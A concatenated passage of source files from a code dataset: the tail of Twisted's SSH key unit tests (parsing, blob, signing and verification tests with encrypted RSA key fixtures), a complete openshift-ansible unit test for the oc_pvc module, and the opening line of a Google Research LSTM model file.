2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
# key with invalid encryption type
self.assertRaises(
keys.BadKeyError, keys.Key.fromString,
"""-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: FOO-123-BAR,01234567
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
# key with bad IV (AES)
self.assertRaises(
keys.BadKeyError, keys.Key.fromString,
"""-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,01234
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
# key with bad IV (DES3)
self.assertRaises(
keys.BadKeyError, keys.Key.fromString,
"""-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,01234
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
def test_fromFile(self):
"""
Test that fromFile works correctly.
"""
self.assertEqual(keys.Key.fromFile(self.keyFile),
keys.Key.fromString(keydata.privateRSA_lsh))
self.assertRaises(keys.BadKeyError, keys.Key.fromFile,
self.keyFile, 'bad_type')
self.assertRaises(keys.BadKeyError, keys.Key.fromFile,
self.keyFile, passphrase='unencrypted')
def test_init(self):
"""
Test that the PublicKey object is initialized correctly.
"""
obj = Crypto.PublicKey.RSA.construct((1L, 2L))
key = keys.Key(obj)
self.assertEqual(key.keyObject, obj)
def test_equal(self):
"""
Test that Key objects are compared correctly.
"""
rsa1 = keys.Key(self.rsaObj)
rsa2 = keys.Key(self.rsaObj)
rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
dsa = keys.Key(self.dsaObj)
self.assertTrue(rsa1 == rsa2)
self.assertFalse(rsa1 == rsa3)
self.assertFalse(rsa1 == dsa)
self.assertFalse(rsa1 == object)
self.assertFalse(rsa1 == None)
def test_notEqual(self):
"""
Test that Key objects are not-compared correctly.
"""
rsa1 = keys.Key(self.rsaObj)
rsa2 = keys.Key(self.rsaObj)
rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
dsa = keys.Key(self.dsaObj)
self.assertFalse(rsa1 != rsa2)
self.assertTrue(rsa1 != rsa3)
self.assertTrue(rsa1 != dsa)
self.assertTrue(rsa1 != object)
self.assertTrue(rsa1 != None)
def test_type(self):
"""
Test that the type method returns the correct type for an object.
"""
self.assertEqual(keys.Key(self.rsaObj).type(), 'RSA')
self.assertEqual(keys.Key(self.rsaObj).sshType(), 'ssh-rsa')
self.assertEqual(keys.Key(self.dsaObj).type(), 'DSA')
self.assertEqual(keys.Key(self.dsaObj).sshType(), 'ssh-dss')
self.assertRaises(RuntimeError, keys.Key(None).type)
self.assertRaises(RuntimeError, keys.Key(None).sshType)
self.assertRaises(RuntimeError, keys.Key(self).type)
self.assertRaises(RuntimeError, keys.Key(self).sshType)
def test_fromBlob(self):
"""
Test that a public key is correctly generated from a public key blob.
"""
rsaBlob = common.NS('ssh-rsa') + common.MP(2) + common.MP(3)
rsaKey = keys.Key.fromString(rsaBlob)
dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5))
dsaKey = keys.Key.fromString(dsaBlob)
badBlob = common.NS('ssh-bad')
self.assertTrue(rsaKey.isPublic())
self.assertEqual(rsaKey.data(), {'e':2L, 'n':3L})
self.assertTrue(dsaKey.isPublic())
self.assertEqual(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L})
self.assertRaises(keys.BadKeyError,
keys.Key.fromString, badBlob)
def test_fromPrivateBlob(self):
"""
Test that a private key is correctly generated from a private key blob.
"""
rsaBlob = (common.NS('ssh-rsa') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5) + common.MP(6) + common.MP(7))
rsaKey = keys.Key._fromString_PRIVATE_BLOB(rsaBlob)
dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5) + common.MP(6))
dsaKey = keys.Key._fromString_PRIVATE_BLOB(dsaBlob)
badBlob = common.NS('ssh-bad')
self.assertFalse(rsaKey.isPublic())
self.assertEqual(
rsaKey.data(), {'n':2L, 'e':3L, 'd':4L, 'u':5L, 'p':6L, 'q':7L})
self.assertFalse(dsaKey.isPublic())
self.assertEqual(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L, 'x':6L})
self.assertRaises(
keys.BadKeyError, keys.Key._fromString_PRIVATE_BLOB, badBlob)
def test_blob(self):
"""
Test that the Key object generates blobs correctly.
"""
self.assertEqual(keys.Key(self.rsaObj).blob(),
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x02'
'\x00\x00\x00\x01\x01')
self.assertEqual(keys.Key(self.dsaObj).blob(),
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02'
'\x00\x00\x00\x01\x01')
badKey = keys.Key(None)
self.assertRaises(RuntimeError, badKey.blob)
def test_privateBlob(self):
"""
L{Key.privateBlob} returns the SSH protocol-level format of the private
key and raises L{RuntimeError} if the underlying key object is invalid.
"""
self.assertEqual(keys.Key(self.rsaObj).privateBlob(),
'\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'
'\x00\x00\x00\x01\x02\x00\x00\x00\x01\x03\x00'
'\x00\x00\x01\x04\x00\x00\x00\x01\x04\x00\x00'
'\x00\x01\x05')
self.assertEqual(keys.Key(self.dsaObj).privateBlob(),
'\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02\x00'
'\x00\x00\x01\x01\x00\x00\x00\x01\x05')
badKey = keys.Key(None)
self.assertRaises(RuntimeError, badKey.privateBlob)
def test_toOpenSSH(self):
"""
Test that the Key object generates OpenSSH keys correctly.
"""
key = keys.Key.fromString(keydata.privateRSA_lsh)
self.assertEqual(key.toString('openssh'), keydata.privateRSA_openssh)
self.assertEqual(key.toString('openssh', 'encrypted'),
keydata.privateRSA_openssh_encrypted)
self.assertEqual(key.public().toString('openssh'),
keydata.publicRSA_openssh[:-8]) # no comment
self.assertEqual(key.public().toString('openssh', 'comment'),
keydata.publicRSA_openssh)
key = keys.Key.fromString(keydata.privateDSA_lsh)
self.assertEqual(key.toString('openssh'), keydata.privateDSA_openssh)
self.assertEqual(key.public().toString('openssh', 'comment'),
keydata.publicDSA_openssh)
self.assertEqual(key.public().toString('openssh'),
keydata.publicDSA_openssh[:-8]) # no comment
def test_toLSH(self):
"""
Test that the Key object generates LSH keys correctly.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh)
self.assertEqual(key.toString('lsh'), keydata.privateRSA_lsh)
self.assertEqual(key.public().toString('lsh'),
keydata.publicRSA_lsh)
key = keys.Key.fromString(keydata.privateDSA_openssh)
self.assertEqual(key.toString('lsh'), keydata.privateDSA_lsh)
self.assertEqual(key.public().toString('lsh'),
keydata.publicDSA_lsh)
def test_toAgentv3(self):
"""
Test that the Key object generates Agent v3 keys correctly.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh)
self.assertEqual(key.toString('agentv3'), keydata.privateRSA_agentv3)
key = keys.Key.fromString(keydata.privateDSA_openssh)
self.assertEqual(key.toString('agentv3'), keydata.privateDSA_agentv3)
def test_toStringErrors(self):
"""
Test that toString raises errors appropriately.
"""
self.assertRaises(keys.BadKeyError, keys.Key(self.rsaObj).toString,
'bad_type')
def test_sign(self):
"""
Test that the Key object generates correct signatures.
"""
key = keys.Key.fromString(keydata.privateRSA_openssh)
self.assertEqual(key.sign(''), self.rsaSignature)
key = keys.Key.fromString(keydata.privateDSA_openssh)
self.assertEqual(key.sign(''), self.dsaSignature)
def test_verify(self):
"""
Test that the Key object correctly verifies signatures.
"""
key = keys.Key.fromString(keydata.publicRSA_openssh)
self.assertTrue(key.verify(self.rsaSignature, ''))
self.assertFalse(key.verify(self.rsaSignature, 'a'))
self.assertFalse(key.verify(self.dsaSignature, ''))
key = keys.Key.fromString(keydata.publicDSA_openssh)
self.assertTrue(key.verify(self.dsaSignature, ''))
self.assertFalse(key.verify(self.dsaSignature, 'a'))
self.assertFalse(key.verify(self.rsaSignature, ''))
def test_verifyDSANoPrefix(self):
"""
Some commercial SSH servers send DSA keys as 2 20-byte numbers;
they are still verified as valid keys.
"""
key = keys.Key.fromString(keydata.publicDSA_openssh)
self.assertTrue(key.verify(self.dsaSignature[-40:], ''))
def test_repr(self):
"""
Test the pretty representation of Key.
"""
self.assertEqual(repr(keys.Key(self.rsaObj)),
"""<RSA Private Key (0 bits)
attr d:
\t03
attr e:
\t02
attr n:
\t01
attr p:
\t04
attr q:
\t05
attr u:
\t04>""")
| bsd-3-clause |
EricMountain-1A/openshift-ansible | roles/lib_openshift/src/test/unit/test_oc_pvc.py | 60 | 13429 | '''
Unit tests for oc pvc
'''
import copy
import os
import six
import sys
import unittest
import mock
# Removing invalid variable names for tests so that I can
# keep them brief
# pylint: disable=invalid-name,no-name-in-module
# Disable import-error b/c our libraries aren't loaded in jenkins
# pylint: disable=import-error,wrong-import-position
# place class in our python path
module_path = os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-4]), 'library') # noqa: E501
sys.path.insert(0, module_path)
from oc_pvc import OCPVC, locate_oc_binary # noqa: E402
class OCPVCTest(unittest.TestCase):
'''
Test class for OCPVC
'''
params = {'kubeconfig': '/etc/origin/master/admin.kubeconfig',
'state': 'present',
'debug': False,
'name': 'mypvc',
'namespace': 'test',
'volume_capacity': '1G',
'selector': {'foo': 'bar', 'abc': 'a123'},
'storage_class_name': 'mystorage',
'access_modes': 'ReadWriteMany'}
@mock.patch('oc_pvc.Utils.create_tmpfile_copy')
@mock.patch('oc_pvc.OCPVC._run')
def test_create_pvc(self, mock_run, mock_tmpfile_copy):
''' Testing a pvc create '''
params = copy.deepcopy(OCPVCTest.params)
pvc = '''{"kind": "PersistentVolumeClaim",
"apiVersion": "v1",
"metadata": {
"name": "mypvc",
"namespace": "test",
"selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
"uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
"resourceVersion": "126510787",
"creationTimestamp": "2017-01-12T15:04:50Z",
"labels": {
"mypvc": "database"
},
"annotations": {
"pv.kubernetes.io/bind-completed": "yes",
"pv.kubernetes.io/bound-by-controller": "yes",
"v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
}
},
"spec": {
"accessModes": [
"ReadWriteOnce"
],
"resources": {
"requests": {
"storage": "1Gi"
}
},
"selector": {
"matchLabels": {
"foo": "bar",
"abc": "a123"
}
},
"storageClassName": "myStorage",
"volumeName": "pv-aws-ow5vl"
},
"status": {
"phase": "Bound",
"accessModes": [
"ReadWriteOnce"
],
"capacity": {
"storage": "1Gi"
}
}
}'''
mock_run.side_effect = [
(1, '', 'Error from server: persistentvolumeclaims "mypvc" not found'),
(1, '', 'Error from server: persistentvolumeclaims "mypvc" not found'),
(0, '', ''),
(0, pvc, ''),
]
mock_tmpfile_copy.side_effect = [
'/tmp/mocked_kubeconfig',
]
results = OCPVC.run_ansible(params, False)
self.assertTrue(results['changed'])
self.assertEqual(results['results']['results'][0]['metadata']['name'], 'mypvc')
self.assertEqual(results['results']['results'][0]['spec']['storageClassName'], 'myStorage')
self.assertEqual(results['results']['results'][0]['spec']['selector']['matchLabels']['foo'], 'bar')
@mock.patch('oc_pvc.Utils.create_tmpfile_copy')
@mock.patch('oc_pvc.OCPVC._run')
def test_update_pvc(self, mock_run, mock_tmpfile_copy):
''' Testing a pvc create '''
params = copy.deepcopy(OCPVCTest.params)
params['access_modes'] = 'ReadWriteMany'
pvc = '''{"kind": "PersistentVolumeClaim",
"apiVersion": "v1",
"metadata": {
"name": "mypvc",
"namespace": "test",
"selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
"uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
"resourceVersion": "126510787",
"creationTimestamp": "2017-01-12T15:04:50Z",
"labels": {
"mypvc": "database"
},
"annotations": {
"pv.kubernetes.io/bind-completed": "yes",
"pv.kubernetes.io/bound-by-controller": "yes",
"v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
}
},
"spec": {
"accessModes": [
"ReadWriteOnce"
],
"resources": {
"requests": {
"storage": "1Gi"
}
},
"volumeName": "pv-aws-ow5vl"
},
"status": {
"phase": "Bound",
"accessModes": [
"ReadWriteOnce"
],
"capacity": {
"storage": "1Gi"
}
}
}'''
mod_pvc = '''{"kind": "PersistentVolumeClaim",
"apiVersion": "v1",
"metadata": {
"name": "mypvc",
"namespace": "test",
"selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
"uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
"resourceVersion": "126510787",
"creationTimestamp": "2017-01-12T15:04:50Z",
"labels": {
"mypvc": "database"
},
"annotations": {
"pv.kubernetes.io/bind-completed": "yes",
"pv.kubernetes.io/bound-by-controller": "yes",
"v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
}
},
"spec": {
"accessModes": [
"ReadWriteMany"
],
"resources": {
"requests": {
"storage": "1Gi"
}
},
"volumeName": "pv-aws-ow5vl"
},
"status": {
"phase": "Bound",
"accessModes": [
"ReadWriteOnce"
],
"capacity": {
"storage": "1Gi"
}
}
}'''
mock_run.side_effect = [
(0, pvc, ''),
(0, pvc, ''),
(0, '', ''),
(0, mod_pvc, ''),
]
mock_tmpfile_copy.side_effect = [
'/tmp/mocked_kubeconfig',
]
results = OCPVC.run_ansible(params, False)
self.assertFalse(results['changed'])
self.assertEqual(results['results']['msg'], '##### - This volume is currently bound. Will not update - ####')
@mock.patch('oc_pvc.Utils.create_tmpfile_copy')
@mock.patch('oc_pvc.OCPVC._run')
def test_delete_pvc(self, mock_run, mock_tmpfile_copy):
''' Testing a pvc create '''
params = copy.deepcopy(OCPVCTest.params)
params['state'] = 'absent'
pvc = '''{"kind": "PersistentVolumeClaim",
"apiVersion": "v1",
"metadata": {
"name": "mypvc",
"namespace": "test",
"selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
"uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
"resourceVersion": "126510787",
"creationTimestamp": "2017-01-12T15:04:50Z",
"labels": {
"mypvc": "database"
},
"annotations": {
"pv.kubernetes.io/bind-completed": "yes",
"pv.kubernetes.io/bound-by-controller": "yes",
"v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
}
},
"spec": {
"accessModes": [
"ReadWriteOnce"
],
"resources": {
"requests": {
"storage": "1Gi"
}
},
"volumeName": "pv-aws-ow5vl"
},
"status": {
"phase": "Bound",
"accessModes": [
"ReadWriteOnce"
],
"capacity": {
"storage": "1Gi"
}
}
}'''
mock_run.side_effect = [
(0, pvc, ''),
(0, '', ''),
]
mock_tmpfile_copy.side_effect = [
'/tmp/mocked_kubeconfig',
]
results = OCPVC.run_ansible(params, False)
self.assertTrue(results['changed'])
@unittest.skipIf(six.PY3, 'py2 test only')
@mock.patch('os.path.exists')
@mock.patch('os.environ.get')
def test_binary_lookup_fallback(self, mock_env_get, mock_path_exists):
''' Testing binary lookup fallback '''
mock_env_get.side_effect = lambda _v, _d: ''
mock_path_exists.side_effect = lambda _: False
self.assertEqual(locate_oc_binary(), 'oc')
@unittest.skipIf(six.PY3, 'py2 test only')
@mock.patch('os.path.exists')
@mock.patch('os.environ.get')
def test_binary_lookup_in_path(self, mock_env_get, mock_path_exists):
''' Testing binary lookup in path '''
oc_bin = '/usr/bin/oc'
mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
mock_path_exists.side_effect = lambda f: f == oc_bin
self.assertEqual(locate_oc_binary(), oc_bin)
@unittest.skipIf(six.PY3, 'py2 test only')
@mock.patch('os.path.exists')
@mock.patch('os.environ.get')
def test_binary_lookup_in_usr_local(self, mock_env_get, mock_path_exists):
''' Testing binary lookup in /usr/local/bin '''
oc_bin = '/usr/local/bin/oc'
mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
mock_path_exists.side_effect = lambda f: f == oc_bin
self.assertEqual(locate_oc_binary(), oc_bin)
@unittest.skipIf(six.PY3, 'py2 test only')
@mock.patch('os.path.exists')
@mock.patch('os.environ.get')
def test_binary_lookup_in_home(self, mock_env_get, mock_path_exists):
''' Testing binary lookup in ~/bin '''
oc_bin = os.path.expanduser('~/bin/oc')
mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
mock_path_exists.side_effect = lambda f: f == oc_bin
self.assertEqual(locate_oc_binary(), oc_bin)
@unittest.skipIf(six.PY2, 'py3 test only')
@mock.patch('shutil.which')
@mock.patch('os.environ.get')
def test_binary_lookup_fallback_py3(self, mock_env_get, mock_shutil_which):
''' Testing binary lookup fallback '''
mock_env_get.side_effect = lambda _v, _d: ''
mock_shutil_which.side_effect = lambda _f, path=None: None
self.assertEqual(locate_oc_binary(), 'oc')
@unittest.skipIf(six.PY2, 'py3 test only')
@mock.patch('shutil.which')
@mock.patch('os.environ.get')
def test_binary_lookup_in_path_py3(self, mock_env_get, mock_shutil_which):
''' Testing binary lookup in path '''
oc_bin = '/usr/bin/oc'
mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
mock_shutil_which.side_effect = lambda _f, path=None: oc_bin
self.assertEqual(locate_oc_binary(), oc_bin)
@unittest.skipIf(six.PY2, 'py3 test only')
@mock.patch('shutil.which')
@mock.patch('os.environ.get')
def test_binary_lookup_in_usr_local_py3(self, mock_env_get, mock_shutil_which):
''' Testing binary lookup in /usr/local/bin '''
oc_bin = '/usr/local/bin/oc'
mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
mock_shutil_which.side_effect = lambda _f, path=None: oc_bin
self.assertEqual(locate_oc_binary(), oc_bin)
@unittest.skipIf(six.PY2, 'py3 test only')
@mock.patch('shutil.which')
@mock.patch('os.environ.get')
def test_binary_lookup_in_home_py3(self, mock_env_get, mock_shutil_which):
''' Testing binary lookup in ~/bin '''
oc_bin = os.path.expanduser('~/bin/oc')
mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
mock_shutil_which.side_effect = lambda _f, path=None: oc_bin
self.assertEqual(locate_oc_binary(), oc_bin)
| apache-2.0 |
google-research/google-research | kws_streaming/models/lstm.py | 1 | 3941 | # coding=utf-8
